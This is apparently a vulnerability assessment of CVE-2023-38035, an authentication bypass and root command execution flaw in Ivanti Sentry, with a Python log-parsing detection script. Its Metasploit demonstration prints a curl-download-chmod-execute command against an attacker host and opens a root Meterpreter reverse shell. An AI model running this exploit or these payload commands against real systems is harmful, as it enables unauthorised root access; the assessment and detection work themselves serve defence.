Very High
CVE-2023-38035
Description
A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.
Ratings
- Attacker Value: Very High
- Exploitability: Very High
Technical Analysis
Description
Ivanti Sentry (formerly MobileIron Sentry) is vulnerable to an authentication bypass which exposes API functionality that allows for code execution in the context of the root user. The vulnerable endpoint /mics/services/MICSLogService exposes a binary web service protocol, Hessian, which allows remote users to invoke functions within the target Sentry system.

One of the functions accessible via Hessian and the vulnerable endpoint is uploadFileUsingFileInput, which accepts a command argument that gets directly fed into a Runtime.getRuntime().exec(cmd) call. The command is run in the context of the tomcat2 user; however, by default tomcat2 is able to execute commands with sudo, thus we can use this to execute the payload in the context of the root user.
Attacker Value and Exploitability
For attackers this one is pretty juicy as it gives unauthenticated RCE in the context of the root user; it doesn't get much better than that. Seeing CVE-2023-38035 being added to the KEV list only one day after it was published speaks volumes on the usefulness to malicious adversaries. To the attacker's benefit there aren't any definitive IoCs other than unrecognized HTTP requests to /services/*, which should be cause for concern. The only saving grace is that a Shodan search for Ivanti Sentry targets on the internet only yielded around 500 vulnerable instances exposed at the time the vuln was disclosed.
Vulnerable Versions
Ivanti Sentry versions vulnerable to CVE-2023-38035:
- <= 9.18.0
Vulnerable Environment
A vulnerable MobileIron Sentry version 9.12.0-16 .vhd file can be downloaded from the following URL
Metasploit Module Demonstration
msf6 > use linux/http/ivanti_sentry_misc_log_service
[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set rhosts 192.168.1.78
rhosts => 192.168.1.78
msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set lhost 192.168.1.72
lhost => 192.168.1.72
msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set fetch_srvhost 192.168.1.72
fetch_srvhost => 192.168.1.72
msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set verbose true
verbose => true
msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > exploit
[*] Reloading module...
[*] Command to run on remote host: curl -so /tmp/ccrjHXsc http://192.168.1.72:8080/etRbFA76UzDRclkL8zrTdg; chmod +x /tmp/ccrjHXsc; /tmp/ccrjHXsc &
[*] Fetch Handler listening on 192.168.1.72:8080
[*] HTTP server started
[*] Adding resource /etRbFA76UzDRclkL8zrTdg
[*] Started reverse TCP handler on 192.168.1.72:4443
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing Unix (In-Memory) for cmd/linux/http/x64/meterpreter_reverse_tcp
[*] Running the command: sudo curl -so /tmp/ccrjHXsc http://192.168.1.72:8080/etRbFA76UzDRclkL8zrTdg
[*] Client 192.168.1.78 requested /etRbFA76UzDRclkL8zrTdg
[*] Sending payload to 192.168.1.78 (curl/7.29.0)
[*] Running the command: sudo chmod +x /tmp/ccrjHXsc
[*] Running the command: sudo /tmp/ccrjHXsc &
[*] Meterpreter session 6 opened (192.168.1.72:4443 -> 192.168.1.78:40550) at 2023-08-29 14:27:57 -0400
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.8.2003 (Linux 3.10.0-1160.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit
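The assessment above notes that the only practical indicator is unrecognized HTTP requests to the services path, with /mics/services/MICSLogService being the Hessian endpoint. The following is an added detection example, not part of the original assessment or of any Ivanti or Metasploit code: it parses Apache-style access-log lines (an assumed log format) and flags requests under /mics/services/ from hosts outside an allow-list of known admin sources. The sample log lines are constructed.

```python
import re

# Apache HTTPD common/combined access-log format (assumption: the Sentry
# front end logs in this layout; adjust the regex if your deployment differs).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# The assessment names requests to the services path as the only real indicator;
# MICSLogService is the endpoint it describes as exposing Hessian.
SERVICES_PREFIX = "/mics/services/"
HESSIAN_ENDPOINT = "/mics/services/MICSLogService"


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_suspicious(lines, allowed_sources=()):
    """Return parsed entries that hit /mics/services/* from a source not in
    allowed_sources. Hits on MICSLogService itself are tagged 'hessian-endpoint',
    anything else under the prefix 'mics-services'."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]  # ignore any query string
        if not path.startswith(SERVICES_PREFIX) or rec["src"] in allowed_sources:
            continue
        rec["tag"] = "hessian-endpoint" if path == HESSIAN_ENDPOINT else "mics-services"
        hits.append(rec)
    return hits


# Constructed sample lines, not real traffic; 203.0.113.0/24 and 192.0.2.0/24
# are documentation ranges. 192.0.2.10 stands in for a known admin host.
SAMPLE_LOG = [
    '203.0.113.9 - - [22/Aug/2023:10:15:01 +0000] "POST /mics/services/MICSLogService HTTP/1.1" 200 512',
    '192.0.2.10 - - [22/Aug/2023:10:15:05 +0000] "GET /mics/ HTTP/1.1" 200 2048',
    '203.0.113.9 - - [22/Aug/2023:10:15:07 +0000] "GET /mics/services/ HTTP/1.1" 403 120',
    '192.0.2.10 - - [22/Aug/2023:10:16:00 +0000] "POST /mics/services/MICSLogService HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG, allowed_sources={"192.0.2.10"}):
        print(hit["tag"], hit["src"], hit["method"], hit["path"], hit["status"])
```

Run it against a real access log by reading the file's lines into find_suspicious and populating allowed_sources with the admin hosts that legitimately reach the MICS interface; a hit on the Hessian endpoint from anywhere else is worth an immediate look.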
General Information
Vendors
- ivanti
Products
- mobileiron sentry
Exploited in the Wild
- Government or Industry Alert (https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
- Other: CISA Gov Alert (https://www.cisa.gov/news-events/alerts/2023/08/22/cisa-adds-two-known-exploited-vulnerabilities-catalog)